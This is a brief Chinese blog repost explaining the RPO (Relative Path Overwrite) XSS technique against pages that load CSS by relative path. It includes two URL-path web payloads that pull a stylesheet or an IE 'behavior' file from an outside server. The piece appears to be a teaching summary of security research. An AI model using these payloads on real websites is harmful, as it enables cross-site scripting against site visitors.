XSS:RPO(Relative Path Overwrite)攻击
生活随笔
收集整理的這篇文章主要介紹了
XSS:RPO(Relative Path Overwrite)攻击
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
0x00
具體原理參考:
Infinite Security: (Relative Path Overwrite) RPO XSS
RPO Gadgets
RPO攻擊
0x01
RPO攻擊首先利用的是通過相對路徑引入的CSS,如
<link href="styles.css" rel="stylesheet" type="text/css" />
當我們在URL最后添加
/%0a{}*{background:red;}/
的時候會發現頁面執行了我們的css代碼。
通過這點,我們可以做到任意加載服務器上的文件。
假若我們能控制某些文件就可以達到XSS的目的。
幾個Payload:
/%0a{}@import url("http://server/style.css")/
/%0a{}img{behavior:url(http://server/test.png);}/
?
總結
以上是生活随笔為你收集整理的XSS:RPO(Relative Path Overwrite)攻击的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 干货|如何在无回显时渗透
- 下一篇: Access-Control-Allow